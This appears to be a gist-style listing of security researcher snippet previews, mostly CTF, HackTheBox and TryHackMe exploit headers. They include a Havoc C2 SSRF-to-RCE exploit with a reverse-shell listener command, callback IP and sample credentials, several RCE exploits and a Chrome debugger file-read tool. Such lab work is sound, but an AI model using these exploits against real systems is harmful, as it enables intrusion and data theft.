# Havoc C2 SSRF to AuthN RCE | |
# @author longcat (https://sth.sh) | |
# | |
# sudo ncat -lvp 443 | |
# python havoc_ssrf2rce.py -t https://havoc.c2/ -l 1.3.3.7 --c2user 5pider --c2pass RKnnj5Vfq3bt9y7L | |
# (the AuthN RCE stage needs valid teamserver operator credentials; note that a password passed via --c2pass is visible in shell history and `ps` output) | |
# | |
# The original authors are @_chebuya (SSRF) and Laurence Tennant, Include Security (AuthN RCE) | |
# Their writeups are great; I was fascinated reading @_chebuya's blog post :) | |
# My work is just to integrate both into a single-shot exploit. | |
# In short: make the WebSocket transport work with the Havoc C2 agent payload |
#!/usr/bin/env python | |
# @author: longcat | |
# SEC Playground Bloody Xmas 2024 - Bookclub | |
# Exploit #2 - Read Flag w/ RCE (Reverse Shell) | |
import requests | |
import sys | |
import time | |
import argparse | |
import urllib3 |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Exploit for HackTheBox Clicker Machine (https://app.hackthebox.com/machines/564) | |
import requests | |
import random | |
import string | |
import urllib.parse | |
from base64 import b64encode,b64decode | |
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) | |
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'} |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Compiled list of my common bloodhound-python problems & solutions | |
Bloodhound-python Error #0 | |
Symptom: the collected data lacks GPO information and permission-abuse edges. | |
Fix: add the collection option `-c All,LoggedOn` | |
Bloodhound-python Error #1 | |
raise NoNameservers(request=self.request, errors=self.errors) | |
dns.resolver.NoNameservers: All nameservers failed to answer the query _ldap._tcp.pdc._msdcs.DCHOSTNAME. IN SRV: Server 10.3.3.7 TCP port 53 answered SERVFAIL |
# A numeric lock has a 3 digit key | |
# "682" - One number is correct and well placed | |
# "614" - One number is correct but wrongly placed | |
# "206" - Two number are correct but wrongly placed | |
# "738" - Nothing is correct | |
# "780" - One number is correct but wrongly placed | |
from z3 import * | |
# Create three integer variables for the lock digits |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# I tried all of jadx's deobfuscation options, but none of them worked. | |
# This script can be used to replace strings.xml values in a target Java file | |
# if (!Intrinsics.areEqual(param, context.getString(R.string.m1))) { -> if (!Intrinsics.areEqual(param, "monday")) { | |
# Prompted and modified with ChatGPT for FlareOn 10's ItsOnFire | |
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources/com/secure/itsonfire/MessageWorker.java | |
# Usage: python apk_getString_R_string.py resources/res/values/strings.xml sources | |
import xml.etree.ElementTree as ET | |
import re | |
import sys |
#!/usr/bin/env zsh | |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Ansible's Vultr module is lacking, so I built my own. | |
# Nuke all my Vultr instances | |
ssh_key=$(cat ~/.ssh/id_ed25519_vultr.pub) | |
echo $ssh_key | |
# List Instances | |
curl "https://api.vultr.com/v2/instances" \ | |
-X GET \ |
#!/bin/zsh | |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# https://tryhackme.com/room/lookingglass | |
# 10.10.169.23 | |
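# Probe one TCP port on the target: open an ssh session as root on that
# port and search the session output for the literal string 'Higher'.
# On a match it prints "Higher" and exits 0 — note that `exit` inside a
# function terminates the whole script, not just the function, which is
# presumably what the enclosing port search relies on. Otherwise it
# prints "Lower" and returns.
# $1 - port number passed to `ssh -p`; ssh's stderr is discarded.
function ssh_connect {
    # An empty port would silently be reported as "Lower" (ssh fails with
    # its stderr hidden), so reject it up front instead of guessing.
    [[ -n "$1" ]] || { echo "usage: ssh_connect PORT" >&2; return 1; }
    # "$1" is quoted so an unexpected value cannot be word-split into
    # extra ssh arguments.
    ssh root@10.10.169.23 -p "$1" 2>/dev/null | grep -q 'Higher' && echo "Higher" && exit 0
    echo "Lower"
}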
#!/usr/bin/env python | |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# 2023-03-07 | |
# Weed Shop RCE Exploit | |
import requests | |
def create_dbfile(filename): | |
# Vulnerability 1: IP Spoofing | |
# File: function.php |
#!/usr/bin/env python | |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# Ported from https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/chrome_debugger.rb | |
# pip install requests websocket-client python-socks | |
# This exploit code can be used to read arbitrary files on the victim machine when | |
# chrome/chromium is running with --remote-debugging-port=9222 — a configuration usually left behind by test-automation tooling during software testing | |
import requests | |
import json | |
import urllib3 | |
import websocket |